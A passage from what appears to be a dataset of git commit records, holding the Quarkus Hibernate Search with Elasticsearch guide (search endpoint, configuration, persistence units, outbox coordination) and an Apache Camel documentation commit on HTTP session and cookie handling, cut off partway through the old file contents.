<1>\n----\n<1> Inject a Hibernate Search session, which relies on the `EntityManager` under the hood.\nApplications with multiple persistence units can use the CDI qualifier `@io.quarkus.hibernate.orm.PersistenceUnit`\nto select the right one:\nsee <<multiple-persistence-units-attaching-cdi>>.\n\nAnd then we can add the following methods (and a few ``import``s):\n\n[source,java]\n----\n @Transactional \/\/ <1>\n void onStart(@Observes StartupEvent ev) throws InterruptedException { \/\/ <2>\n \/\/ only reindex if we imported some content\n if (Book.count() > 0) {\n searchSession.massIndexer()\n .startAndWait();\n }\n }\n\n @GET\n @Path(\"author\/search\") \/\/ <3>\n @Transactional\n public List<Author> searchAuthors(@RestQuery String pattern, \/\/ <4>\n @RestQuery Optional<Integer> size) {\n return searchSession.search(Author.class) \/\/ <5>\n .where(f ->\n pattern == null || pattern.trim().isEmpty() ?\n f.matchAll() : \/\/ <6>\n f.simpleQueryString()\n .fields(\"firstName\", \"lastName\", \"books.title\").matching(pattern) \/\/ <7>\n )\n .sort(f -> f.field(\"lastName_sort\").then().field(\"firstName_sort\")) \/\/ <8>\n .fetchHits(size.orElse(20)); \/\/ <9>\n }\n----\n<1> Important point: we need a transactional context for these methods.\n<2> As we will import data into the PostgreSQL database using an SQL script, we need to reindex the data at startup.\nFor this, we use Hibernate Search's mass indexer, which allows to index a lot of data efficiently (you can fine tune it for better performances).\nAll the upcoming updates coming through Hibernate ORM operations will be synchronized automatically to the full text index.\nIf you don't import data manually in the database, you don't need that:\nthe mass indexer should then only be used when you change your indexing configuration (adding a new field, changing an analyzer's configuration...) and you want the new configuration to be applied to your existing entities.\n<3> This is where the magic begins: just adding the annotations to our entities makes them available for full text search: we can now query the index using the Hibernate Search DSL.\n<4> Use the `org.jboss.resteasy.reactive.RestQuery` annotation type to avoid repeating the parameter name.\n<5> We indicate that we are searching for ``Author``s.\n<6> We create a predicate: if the pattern is empty, we use a `matchAll()` predicate.\n<7> If we have a valid pattern, we create a https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/current\/query-dsl-simple-query-string-query.html[`simpleQueryString()`] predicate on the `firstName`, `lastName` and `books.title` fields matching our pattern.\n<8> We define the sort order of our results. Here we sort by last name, then by first name. Note that we use the specific fields we created for sorting.\n<9> Fetch the `size` top hits, `20` by default. Obviously, paging is also supported.\n\n[NOTE]\n====\nThe Hibernate Search DSL supports a significant subset of the Elasticsearch predicates (match, range, nested, phrase, spatial...).\nFeel free to explore the DSL using autocompletion.\n\nWhen that's not enough, you can always fall back to\nlink:{hibernate-search-doc-prefix}#search-dsl-predicate-extensions-elasticsearch-from-json[defining a predicate using JSON directly].\n====\n\n== Configuring the application\n\nAs usual, we can configure everything in the Quarkus configuration file, `application.properties`.\n\nEdit `src\/main\/resources\/application.properties` and inject the following configuration:\n\n[source,properties]\n----\nquarkus.ssl.native=false <1>\n\nquarkus.datasource.db-kind=postgresql <2>\n\nquarkus.hibernate-orm.database.generation=drop-and-create <3>\nquarkus.hibernate-orm.sql-load-script=import.sql <4>\n\nquarkus.hibernate-search-orm.elasticsearch.version=7 <5>\nquarkus.hibernate-search-orm.elasticsearch.analysis.configurer=bean:myAnalysisConfigurer <6>\nquarkus.hibernate-search-orm.schema-management.strategy=drop-and-create <7>\nquarkus.hibernate-search-orm.automatic-indexing.synchronization.strategy=sync <8>\n\n%prod.quarkus.datasource.jdbc.url=jdbc:postgresql:\/\/localhost\/quarkus_test <9>\n%prod.quarkus.datasource.username=quarkus_test\n%prod.quarkus.datasource.password=quarkus_test\n%prod.hibernate-search-orm.elasticsearch.hosts=localhost:9200 <9>\n----\n<1> We won't use SSL, so we disable it to have a more compact native executable.\n<2> Let's create a PostgreSQL datasource.\n<3> We will drop and recreate the schema every time we start the application.\n<4> We load some initial data.\n<5> We need to tell Hibernate Search about the version of Elasticsearch we will use.\nIt is important because there are significant differences between Elasticsearch mapping syntax depending on the version.\nSince the mapping is created at build time to reduce startup time, Hibernate Search cannot connect to the cluster to automatically detect the version.\nNote that, for OpenSearch, you need to prefix the version with `opensearch:`; see <<opensearch>>.\n<6> We point to the custom `AnalysisConfigurer` which defines the configuration of our analyzers and normalizers.\n<7> Obviously, this is not for production: we drop and recreate the index every time we start the application.\n<8> This means that we wait for the entities to be searchable before considering a write complete.\nOn a production setup, the `write-sync` default will provide better performance.\nUsing `sync` is especially important when testing as you need the entities to be searchable immediately.\n<9> For development and tests, we rely on <<dev-services,Dev Services>>,\nwhich means Quarkus will start a PostgreSQL database and Elasticsearch cluster automatically.\nIn production mode, however,\nyou will want to start a PostgreSQL database and Elasticsearch cluster manually,\nwhich is why we provide Quarkus with this connection info in the `prod` profile (`%prod.` prefix).\n\n[TIP]\nFor more information about the Hibernate Search extension configuration please refer to the <<configuration-reference, Configuration Reference>>.\n\n[[dev-services]]\n=== Dev Services (Configuration Free Databases)\nQuarkus supports a feature called Dev Services that allows you to start various containers without any config.\nIn the case of Elasticsearch this support extends to the default Elasticsearch connection.\nWhat that means practically, is that if you have not configured `quarkus.hibernate-search-orm.elasticsearch.hosts` Quarkus will automatically\nstart an Elasticsearch container when running tests or in xref:dev-mode-differences.adoc[dev mode], and automatically configure the connection.\n\nWhen running the production version of the application, the Elasticsearch connection needs to be configured as normal,\nso if you want to include a production database config in your `application.properties` and continue to use Dev Services\nwe recommend that you use the `%prod.` profile to define your Elasticsearch settings.\n\nNOTE: Dev Services for Elasticsearch is currently unable to start multiple clusters concurrently, so it only works with the default backend of the default persistence unit: named persistence units or named backends won't be able to take advantage of Dev Services for Elasticsearch.\n\nFor more information you can read the xref:elasticsearch-dev-services.adoc[Dev Services for Elasticsearch guide].\n\n== Creating a frontend\n\nNow let's add a simple web page to interact with our `LibraryResource`.\nQuarkus automatically serves static resources located under the `META-INF\/resources` directory.\nIn the `src\/main\/resources\/META-INF\/resources` directory, overwrite the existing `index.html` file with the content from this\n{quickstarts-blob-url}\/hibernate-search-orm-elasticsearch-quickstart\/src\/main\/resources\/META-INF\/resources\/index.html[index.html] file.\n\n== Automatic import script\n\nFor the purpose of this demonstration, let's import an initial dataset.\n\nLet's create a `src\/main\/resources\/import.sql` file with the following content:\n\n[source,sql]\n----\nINSERT INTO author(id, firstname, lastname) VALUES (nextval('hibernate_sequence'), 'John', 'Irving');\nINSERT INTO author(id, firstname, lastname) VALUES (nextval('hibernate_sequence'), 'Paul', 'Auster');\n\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'The World According to Garp', 1);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'The Hotel New Hampshire', 1);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'The Cider House Rules', 1);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'A Prayer for Owen Meany', 1);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'Last Night in Twisted River', 1);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'In One Person', 1);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'Avenue of Mysteries', 1);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'The New York Trilogy', 2);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'Mr. Vertigo', 2);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'The Brooklyn Follies', 2);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'Invisible', 2);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), 'Sunset Park', 2);\nINSERT INTO book(id, title, author_id) VALUES (nextval('hibernate_sequence'), '4 3 2 1', 2);\n----\n\n== Time to play with your application\n\nYou can now interact with your REST service:\n\n:devtools-wrapped:\n\n * start your Quarkus application with:\n+\ninclude::{includes}\/devtools\/dev.adoc[]\n * open a browser to `http:\/\/localhost:8080\/`\n * search for authors or book titles (we initialized some data for you)\n * create new authors and books and search for them too\n\n:!devtools-wrapped:\n\nAs you can see, all your updates are automatically synchronized to the Elasticsearch cluster.\n\n[[opensearch]]\n== OpenSearch compatibility\n\nHibernate Search is compatible with both https:\/\/www.elastic.co\/elasticsearch[Elasticsearch]\nand https:\/\/www.opensearch.org\/[OpenSearch],\nbut it assumes it is working with an Elasticsearch cluster by default.\n\nTo have Hibernate Search work with an OpenSearch cluster instead,\nlink:{hibernate-search-doc-prefix}#backend-elasticsearch-configuration-version[prefix the configured version with `opensearch:`],\nas shown below.\n\n[source,properties]\n----\nquarkus.hibernate-search-orm.elasticsearch.version=opensearch:1.2\n----\n\nAll other configuration options and APIs are exactly the same as with Elasticsearch.\n\nYou can find more information about compatible distributions and versions of Elasticsearch in\nlink:{hibernate-search-doc-prefix}#getting-started-compatibility[this section of Hibernate Search's reference documentation].\n\n[[multiple-persistence-units]]\n== Multiple persistence units\n\n=== Configuring multiple persistence units\n\nWith the Hibernate ORM extension,\nxref:hibernate-orm.adoc#multiple-persistence-units[you can set up multiple persistence units],\neach with its own datasource and configuration.\n\nIf you do declare multiple persistence units,\nyou will also configure Hibernate Search separately for each persistence unit.\n\nThe properties at the root of the `quarkus.hibernate-search-orm.` namespace define the default persistence unit.\nFor instance, the following snippet defines a default datasource and a default persistence unit,\nand sets the Elasticsearch host for that persistence unit to `es1.mycompany.com:9200`.\n\n[source,properties]\n----\nquarkus.datasource.db-kind=h2\nquarkus.datasource.jdbc.url=jdbc:h2:mem:default;DB_CLOSE_DELAY=-1\n\nquarkus.hibernate-orm.dialect=org.hibernate.dialect.H2Dialect\n\nquarkus.hibernate-search-orm.elasticsearch.hosts=es1.mycompany.com:9200\nquarkus.hibernate-search-orm.elasticsearch.version=7\nquarkus.hibernate-search-orm.automatic-indexing.synchronization.strategy=write-sync\n----\n\nUsing a map based approach, it is also possible to configure named persistence units:\n\n[source,properties]\n----\nquarkus.datasource.\"users\".db-kind=h2 <1>\nquarkus.datasource.\"users\".jdbc.url=jdbc:h2:mem:users;DB_CLOSE_DELAY=-1\n\nquarkus.datasource.\"inventory\".db-kind=h2 <2>\nquarkus.datasource.\"inventory\".jdbc.url=jdbc:h2:mem:inventory;DB_CLOSE_DELAY=-1\n\nquarkus.hibernate-orm.\"users\".datasource=users <3>\nquarkus.hibernate-orm.\"users\".packages=org.acme.model.user\n\nquarkus.hibernate-orm.\"inventory\".datasource=inventory <4>\nquarkus.hibernate-orm.\"inventory\".packages=org.acme.model.inventory\n\nquarkus.hibernate-search-orm.\"users\".elasticsearch.hosts=es1.mycompany.com:9200 <5>\nquarkus.hibernate-search-orm.\"users\".elasticsearch.version=7\nquarkus.hibernate-search-orm.\"users\".automatic-indexing.synchronization.strategy=write-sync\n\nquarkus.hibernate-search-orm.\"inventory\".elasticsearch.hosts=es2.mycompany.com:9200 <6>\nquarkus.hibernate-search-orm.\"inventory\".elasticsearch.version=7\nquarkus.hibernate-search-orm.\"inventory\".automatic-indexing.synchronization.strategy=write-sync\n----\n<1> Define a datasource named `users`.\n<2> Define a datasource named `inventory`.\n<3> Define a persistence unit called `users` pointing to the `users` datasource.\n<4> Define a persistence unit called `inventory` pointing to the `inventory` datasource.\n<5> Configure Hibernate Search for the `users` persistence unit,\nsetting the Elasticsearch host for that persistence unit to `es1.mycompany.com:9200`.\n<6> Configure Hibernate Search for the `inventory` persistence unit,\nsetting the Elasticsearch host for that persistence unit to `es2.mycompany.com:9200`.\n\n[[multiple-persistence-units-attaching-model-classes]]\n=== Attaching model classes to persistence units\n\nFor each persistence unit, Hibernate Search will only consider indexed entities that are attached to that persistence unit.\nEntities are attached to a persistence unit by\nxref:hibernate-orm.adoc#multiple-persistence-units-attaching-model-classes[configuring the Hibernate ORM extension].\n\n[[multiple-persistence-units-attaching-cdi]]\n== CDI integration\n\nYou can inject Hibernate Search's main entry points, `SearchSession` and `SearchMapping`, using CDI:\n\n[source,java]\n----\n@Inject\nSearchSession searchSession;\n----\n\nThis will inject the `SearchSession` of the default persistence unit.\n\nTo inject the `SearchSession` of a named persistence unit (`users` in our example),\njust add a qualifier:\n\n[source,java]\n----\n@Inject\n@PersistenceUnit(\"users\") <1>\nSearchSession searchSession;\n----\n<1> This is the `@io.quarkus.hibernate.orm.PersistenceUnit` annotation.\n\nYou can inject the `SearchMapping` of a named persistence unit using the exact same mechanism:\n\n[source,java]\n----\n@Inject\n@PersistenceUnit(\"users\")\nSearchMapping searchMapping;\n----\n\n== Building a native executable\n\nYou can build a native executable with the usual command `.\/mvnw package -Pnative`.\n\n[NOTE]\n====\nAs usual with native executable compilation, this operation consumes a lot of memory.\n\nIt might be safer to stop the two containers while you are building the native executable and start them again once you are done.\n====\n\nRunning it is as simple as executing `.\/target\/hibernate-search-orm-elasticsearch-quickstart-1.0.0-SNAPSHOT-runner`.\n\nYou can then point your browser to `http:\/\/localhost:8080\/` and use your application.\n\n[NOTE]\n====\nThe startup is a bit slower than usual: it is mostly due to us dropping and recreating the database schema and the Elasticsearch mapping every time at startup.\nWe also inject some data and execute the mass indexer.\n\nIn a real life application, it is obviously something you won't do at startup.\n====\n\n[[offline-startup]]\n== Offline startup\n\nBy default, Hibernate Search sends a few requests to the Elasticsearch cluster on startup.\nIf the Elasticsearch cluster is not necessarily up and running when Hibernate Search starts,\nthis could cause a startup failure.\n\nTo address this, you can configure Hibernate Search to not send any request on startup:\n\n* Disable Elasticsearch version checks on startup by setting the configuration property\n link:#quarkus-hibernate-search-orm-elasticsearch_quarkus.hibernate-search-orm.elasticsearch.version-check.enabled[`quarkus.hibernate-search-orm.elasticsearch.version-check.enabled`]\n to `false`.\n* Disable schema management on startup by setting the configuration property\n link:#quarkus-hibernate-search-orm-elasticsearch_quarkus.hibernate-search-orm.schema-management.strategy[`quarkus.hibernate-search-orm.schema-management.strategy`]\n to `none`.\n\nOf course, even with this configuration, Hibernate Search still won't be able to index anything or run search queries\nuntil the Elasticsearch cluster becomes accessible.\n\n[IMPORTANT]\n====\nIf you disable automatic schema creation by setting `quarkus.hibernate-search-orm.schema-management.strategy` to `none`,\nyou will have to create the schema manually at some point before your application starts persisting\/updating entities\nand executing search requests.\n\nSee link:{hibernate-search-doc-prefix}#mapper-orm-schema-management-manager[this section of the reference documentation]\nfor more information.\n====\n\n[[coordination]]\n== Coordination through outbox polling\n\n[CAUTION]\n====\nCoordination through outbox polling is considered preview.\n\nIn _preview_, backward compatibility and presence in the ecosystem is not guaranteed.\nSpecific improvements might require changing configuration or APIs, or even storage formats,\nand plans to become _stable_ are under way.\nFeedback is welcome on our https:\/\/groups.google.com\/d\/forum\/quarkus-dev[mailing list]\nor as issues in our https:\/\/github.com\/quarkusio\/quarkus\/issues[GitHub issue tracker].\n====\n\nWhile it\u2019s technically possible to use Hibernate Search and Elasticsearch in distributed applications,\nby default they suffer from\nlink:{hibernate-search-doc-prefix}#architecture-examples-no-coordination-elasticsearch-pros-and-cons[a few limitations].\n\nThese limitations are the result of Hibernate Search not coordinating between threads or application nodes by default.\n\nIn order to get rid of these limitations, you can\nlink:{hibernate-search-doc-prefix}#architecture-examples-outbox-polling-elasticsearch[use the `outbox-polling` coordination strategy].\nThis strategy creates an outbox table in the database to push entity change events to,\nand relies on a background processor to consume these events and perform automatic indexing.\n\nTo enable the `outbox-polling` coordination strategy, an additional extension is required:\n\n:add-extension-extensions: hibernate-search-orm-coordination-outbox-polling\ninclude::{includes}\/devtools\/extension-add.adoc[]\n\nOnce the extension is there, you will need to explicitly select the `outbox-polling` strategy\nby setting link:#quarkus-hibernate-search-orm-elasticsearch_quarkus.hibernate-search-orm.coordination.strategy[`quarkus.hibernate-search-orm.coordination.strategy`]\nto `outbox-polling`.\n\nFinally, you will need to make sure that the Hibernate ORM entities added by Hibernate Search\n(to represent the outbox and agents) have corresponding tables\/sequences in your database:\n\n* If you are just starting with your application\nand intend to xref:hibernate-orm.adoc#dev-mode[let Hibernate ORM generate your database schema],\nthen no worries: the entities required by Hibernate Search will be included in the generated schema.\n* Otherwise, you must\nlink:{hibernate-search-doc-prefix}#coordination-outbox-polling-schema[manually alter your schema to add the necessary tables\/sequences].\n\nOnce you are done with the above, you're ready to use Hibernate Search with an outbox.\nDon't change any code, and just start your application:\nit will automatically detect when multiple applications are connected to the same database,\nand coordinate the index updates accordingly.\n\n[NOTE]\n====\nHibernate Search mostly behaves the same when using the `outbox-polling` coordination strategy\nas when not using it: application code (persisting entities, searching, etc.) should not require any change.\n\nHowever, there is one key difference: index updates are necessarily asynchronous;\nthey are guaranteed to happen _eventually_, but not immediately.\n\nThis means in particular that the configuration property\nlink:#quarkus-hibernate-search-orm-elasticsearch_quarkus.hibernate-search-orm.automatic-indexing.synchronization.strategy[`quarkus.hibernate-search-orm.automatic-indexing.synchronization.strategy`]\ncannot be set when using the `outbox-polling` coordination strategy:\nHibernate Search will always behave as if this property was set to `write-sync` (the default).\n\nThis behavior is consistent with Elasticsearch's\nhttps:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/current\/near-real-time.html[near-real-time search]\nand the recommended way of using Hibernate Search even when coordination is disabled.\n====\n\nFor more information about coordination in Hibernate Search,\nsee link:{hibernate-search-doc-prefix}#coordination[this section of the reference documentation].\n\nFor more information about configuration options related to coordination,\nsee <<configuration-reference-coordination-outbox-polling>>.\n\n[[aws-request-signing]]\n== [[configuration-reference-aws]] AWS request signing\n\nIf you need to use https:\/\/docs.aws.amazon.com\/elasticsearch-service\/[Amazon\u2019s managed Elasticsearch service],\nyou will find it requires a proprietary authentication method involving request signing.\n\nYou can enable AWS request signing in Hibernate Search by adding a dedicated extension to your project and configuring it.\n\nSee link:{hibernate-search-orm-elasticsearch-aws-guide}#aws-configuration-reference[the documentation for the Hibernate Search ORM + Elasticsearch AWS extension]\nfor more information.\n\n== Further reading\n\nIf you are interested in learning more about Hibernate Search 6,\nthe Hibernate team publishes link:{hibernate-search-doc-prefix}[an extensive reference documentation].\n\n== FAQ\n\n=== Why Elasticsearch only?\n\nHibernate Search supports both a Lucene backend and an Elasticsearch backend.\n\nIn the context of Quarkus and to build microservices, we thought the latter would make more sense.\nThus, we focused our efforts on it.\n\nWe don't have plans to support the Lucene backend in Quarkus for now.\n\n[[configuration-reference]]\n== Hibernate Search Configuration Reference\n\n[[configuration-reference-main]]\n=== Main Configuration\n\ninclude::{generated-dir}\/config\/quarkus-hibernate-search-orm-elasticsearch.adoc[leveloffset=+1, opts=optional]\n\n[NOTE]\n[[bean-reference-note-anchor]]\n.About bean references\n====\nWhen referencing beans using a string value in configuration properties, that string is parsed.\n\nHere are the most common formats:\n\n* `bean:` followed by the name of a `@Named` CDI bean.\nFor example `bean:myBean`.\n* `class:` followed by the fully-qualified name of a class, to be instantiated through CDI if it's a CDI bean,\nor through its public, no-argument constructor otherwise.\nFor example `class:com.mycompany.MyClass`.\n* An arbitrary string referencing a built-in implementation.\nAvailable values are detailed in the documentation of each configuration property,\nsuch as `async`\/`read-sync`\/`write-sync`\/`sync` for\n<<quarkus-hibernate-search-orm-elasticsearch_quarkus.hibernate-search-orm.automatic-indexing.synchronization.strategy,`quarkus.hibernate-search-orm.automatic-indexing.synchronization.strategy`>>.\n\nOther formats are also accepted, but are only useful for advanced use cases.\nSee link:{hibernate-search-doc-prefix}#configuration-bean-reference-parsing[this section of Hibernate Search's reference documentation]\nfor more information.\n====\n\n:no-duration-note: true\n\n[[configuration-reference-coordination-outbox-polling]]\n=== Configuration of coordination with outbox polling\n\nNOTE: These configuration properties require an additional extension. See <<coordination>>.\n\ninclude::{generated-dir}\/config\/quarkus-hibernate-search-orm-coordination-outboxpolling.adoc[leveloffset=+1, opts=optional]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7aeecece07b585e39309f9bea8da4bdf0d2c69ad","subject":"Document Update (#4191)","message":"Document Update (#4191)\n\nAdded a space between Exchange and level","repos":"christophd\/camel,pax95\/camel,nikhilvibhav\/camel,tadayosi\/camel,tdiesler\/camel,mcollovati\/camel,gnodet\/camel,cunningt\/camel,gnodet\/camel,tadayosi\/camel,tdiesler\/camel,christophd\/camel,pax95\/camel,apache\/camel,pax95\/camel,tdiesler\/camel,mcollovati\/camel,mcollovati\/camel,cunningt\/camel,mcollovati\/camel,tdiesler\/camel,christophd\/camel,apache\/camel,tadayosi\/camel,cunningt\/camel,alvinkwekel\/camel,nicolaferraro\/camel,pax95\/camel,tadayosi\/camel,adessaigne\/camel,pmoerenhout\/camel,alvinkwekel\/camel,adessaigne\/camel,apache\/camel,pax95\/camel,adessaigne\/camel,alvinkwekel\/camel,pmoerenhout\/camel,tdiesler\/camel,pmoerenhout\/camel,christophd\/camel,apache\/camel,christophd\/camel,cunningt\/camel,adessaigne\/camel,cunningt\/camel,pax95\/camel,gnodet\/camel,nicolaferraro\/camel,gnodet\/camel,tadayosi\/camel,apache\/camel,adessaigne\/camel,tdiesler\/camel,pmoerenhout\/camel,adessaigne\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,christophd\/camel,nicolaferraro\/camel,pmoerenhout\/camel,pmoerenhout\/camel,gnodet\/camel,nikhilvibhav\/camel,tadayosi\/camel,cunningt\/camel,alvinkwekel\/camel,apache\/camel,nicolaferraro\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/http-session-handling.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/http-session-handling.adoc","new_contents":"[[HTTP-SessionHandling]]\n= HTTP Session Handling\n\n*Since Camel 2.19*\n\nSeveral Camel components can use HTTP as the underlying transport\nprotocol. In general HTTP calls are stateless in nature, however some\nservers allow to maintain state via cookies. Cookies are often used to\nmaintain a server session (e.g. via a session cookie called \"JSESSIONID\"\nwith servers implementing the JEE Servlet specification).\n\n[[HTTP-SessionHandling-SessionScope]]\n== Session Scope\n\nIf a Camel route intends to implement some kind of HTTP session handling\nthe scope of this session should be considered.\n\nIndependently from the session scope the implementation must honor the\ndomain of the handled cookies.\n\n[[HTTP-SessionHandling-RouteContextScope]]\n== Route\/Context Scope\n\nIt might be desirable to have a single session for a route or a\nxref:camelcontext.adoc[CamelContext]. This essentially means that all\ncalls to a server issued from a route or CamelContext share a single\nHTTP session.\n\n[[HTTP-SessionHandling-EndpointScope]]\n== Endpoint Scope\n\nIt is also possible to have a session on an xref:endpoint.adoc[Endpoint]\nentity. This would mean that all invocations of an HTTP call issued by a\nsingle Endpoint share a session, whereas different Endpoints never share\nsessions, even if the call is sent to the same server. \nSome components like camel-http, and camel-http support endpoint scoped\nsessions even prior to version 2.19.\n\n[[HTTP-SessionHandling-ExchangeScope]]\n== Exchange Scope\n\nThe third option to define a session scope is on\nxref:exchange.adoc[Exchange] level. This is particularly useful for\nscenarios where the server session is really maintaining state.\n\nIn this case the route could e.g. first do a login call, then some\nupdate calls and finally a logout call. If the session handling would be\ndefined on route or CamelContext scopes this would seem to run, however\nunder load parallel invocations of the route would share a *single*\nsession, which could cause issues. If the session is defined on exchange\nscope, each invocation of the route will get a separate session and the\nserver can maintain a separate state for the different parallel\ninvocations.\n\n[[HTTP-SessionHandling-Usage]]\n== Usage\n\nIf you are a Camel user, you see that several Camel components support\nthe cookieHandler parameter on endpoint level. All you need to do is to\ninstantiate a cookie handler appropriate for your use case and\nreference it in the cookieHandler parameter for all endpoints that are\nsupposed to participate in the HTTP session.\n\nThere are two pre-implemented cookie handlers:\n`org.apache.camel.http.common.cookie.InstanceCookieHandler` and\n`org.apache.camel.http.common.cookie.ExchangeCookieHandler.`\n\nThe `InstanceCookieHandler` stores cookies in an instance of itself.\nYou can compare that with a browser instance that is shared between all\nthe endpoints that use it (and will be used for all invocations of these\nendpoints). If you want to maintain separate sessions for different\nendpoints or groups of endpoints you may have multiple instances of the\n`InstanceCookieHandler`.\n\nThe `ExchangeCookieHandler` stores the session in the exchange. With the\nbrowser analogy this means that each Exchange will get its own browser\ninstance (so sessions are separated). As the `ExchangeCookieHandler`\ndoes not store any state it is generally not useful to have multiple\n`ExchangeCookieHandler` instances (as they would access the same data,\nanyway).\n\n[[HTTP-SessionHandling-Example]]\n== Example\n\nThe following three routes will each do two invocations of an echo REST\nservice. In the first route (without a cookie handler) each invocation\nwill get a new session. For the second route all invocations will share\na session. For the third route the first and the second invocation\nwithin the route share a session, but different (even parallel)\ninvocations of the route will not share a session.\n\n[source,xml]\n--------------------------------------------------------------------------------------------------------\n <cxf:rsClient id=\"rsClientProxy\" address=\"http:\/\/127.0.0.1:8080\/CxfRsProducerSessionTest\/\"\n serviceClass=\"org.apache.camel.component.cxf.jaxrs.testbean.EchoService\"\n loggingFeatureEnabled=\"true\" \/>\n\n <camelContext id=\"camel\" xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route>\n <from uri=\"direct:\/\/proxy\"\/>\n <to uri=\"cxfrs:\/\/bean:\/\/rsClientProxy\"\/>\n <convertBodyTo type=\"java.lang.String\"\/>\n <to uri=\"cxfrs:\/\/bean:\/\/rsClientProxy\"\/>\n <\/route>\n <route>\n <from uri=\"direct:\/\/proxyinstance\"\/>\n <to uri=\"cxfrs:\/\/bean:\/\/rsClientProxy?cookieHandler=#instanceCookieHandler\"\/>\n <convertBodyTo type=\"java.lang.String\"\/>\n <to uri=\"cxfrs:\/\/bean:\/\/rsClientProxy?cookieHandler=#instanceCookieHandler\"\/>\n <\/route>\n <route>\n <from uri=\"direct:\/\/proxyexchange\"\/>\n <to uri=\"cxfrs:\/\/bean:\/\/rsClientProxy?cookieHandler=#exchangeCookieHandler\"\/>\n <convertBodyTo type=\"java.lang.String\"\/>\n <to uri=\"cxfrs:\/\/bean:\/\/rsClientProxy?cookieHandler=#exchangeCookieHandler\"\/>\n <\/route>\n <\/camelContext>\n\n <bean id=\"instanceCookieHandler\" class=\"org.apache.camel.http.common.cookie.InstanceCookieHandler\"\/>\n <bean id=\"exchangeCookieHandler\" class=\"org.apache.camel.http.common.cookie.ExchangeCookieHandler\"\/> \n--------------------------------------------------------------------------------------------------------\n\n[[HTTP-SessionHandling-ComponentDevelopers]]\n== Component Developers\n\nIf you want to develop a HTTP based component that is supposed to\nparticipate in a session you have to add the following parts to your\ncode:\n\n1. Include a build reference to camel-http-common (if it is not already\nthere)\n2. Add a cookieHandler parameter to the endpoint class (together with\ngetter and setter)\n3. Before your code does the HTTP call, if a cookie handler is set on\nthe endpoint perform a `cookieHandler.loadCookies(exchange, uri)` call.\nIt will return a `Map<String, List<String>>` containing the headers that\nneed to be sent to the server. The details how you need to send these\nheaders to the server depend on the underlying HTTP API you are using.\n4. After your code does receive the HTTP response if a cookie handler\nis set on the endpoint perform a\n`cookieHandler.storeCookies(exchange, uri, m)` call. `m` is a\n`Map<String, List<String>>` containing the HTTP headers returned from\nthe server.\n\n[[HTTP-SessionHandling-MoreInfo]]\n== More Info\n\nSome APIs provide more direct support for cookie handling. In this case\nit might be easier to get the underlying `java.net.CookieStore` with a\n`cookeManager.getCookieStore(exchange)` call and handle the cookies\nusing the cookie interface provided by the underlying library.\n\n","old_contents":"[[HTTP-SessionHandling]]\n= HTTP Session Handling\n\n*Since Camel 2.19*\n\nSeveral Camel components can use HTTP as the underlying transport\nprotocol. In general HTTP calls are stateless in nature, however some\nservers allow to maintain state via cookies. Cookies are often used to\nmaintain a server session (e.g. via a session cookie called \"JSESSIONID\"\nwith servers implementing the JEE Servlet specification).\n\n[[HTTP-SessionHandling-SessionScope]]\n== Session Scope\n\nIf a Camel route intends to implement some kind of HTTP session handling\nthe scope of this session should be considered.\n\nIndependently from the session scope the implementation must honor the\ndomain of the handled cookies.\n\n[[HTTP-SessionHandling-RouteContextScope]]\n== Route\/Context Scope\n\nIt might be desirable to have a single session for a route or a\nxref:camelcontext.adoc[CamelContext]. This essentially means that all\ncalls to a server issued from a route or CamelContext share a single\nHTTP session.\n\n[[HTTP-SessionHandling-EndpointScope]]\n== Endpoint Scope\n\nIt is also possible to have a session on an xref:endpoint.adoc[Endpoint]\nentity. This would mean that all invocations of an HTTP call issued by a\nsingle Endpoint share a session, whereas different Endpoints never share\nsessions, even if the call is sent to the same server. \nSome components like camel-http, and camel-http support endpoint scoped\nsessions even prior to version 2.19.\n\n[[HTTP-SessionHandling-ExchangeScope]]\n== Exchange Scope\n\nThe third option to define a session scope is on\nxref:exchange.adoc[Exchange]level. This is particularly useful for\nscenarios where the server session is really maintaining state.\n\nIn this case the route could e.g. first do a login call, then some\nupdate calls and finally a logout call. If the session handling would be\ndefined on route or CamelContext scopes this would seem to run, however\nunder load parallel invocations of the route would share a *single*\nsession, which could cause issues. If the session is defined on exchange\nscope, each invocation of the route will get a separate session and the\nserver can maintain a separate state for the different parallel\ninvocations.\n\n[[HTTP-SessionHandling-Usage]]\n== Usage\n\nIf you are a Camel user, you see that several Camel components support\nthe cookieHandler parameter on endpoint level. All you need to do is to\ninstantiate a cookie handler appropriate for your use case and\nreference it in the cookieHandler parameter for all endpoints that are\nsupposed to participate in the HTTP session.\n\nThere are two pre-implemented cookie handlers:\n`org.apache.camel.http.common.cookie.InstanceCookieHandler` and\n`org.apache.camel.http.common.cookie.ExchangeCookieHandler.`\n\nThe `InstanceCookieHandler` stores cookies in an instance of itself.\nYou can compare that with a browser instance that is shared between all\nthe endpoints that use it (and will be used for all invocations of these\nendpoints). If you want to maintain separate sessions for different\nendpoints or groups of endpoints you may have multiple instances of the\n`InstanceCookieHandler`.\n\nThe `ExchangeCookieHandler` stores the session in the exchange. With the\nbrowser analogy this means that each Exchange will get its own browser\ninstance (so sessions are separated). As the `ExchangeCookieHandler`\ndoes not store any state it is generally not useful to have multiple\n`ExchangeCookieHandler` instances (as they would access the same data,\nanyway).\n\n[[HTTP-SessionHandling-Example]]\n== Example\n\nThe following three routes will each do two invocations of an echo REST\nservice. In the first route (without a cookie handler) each 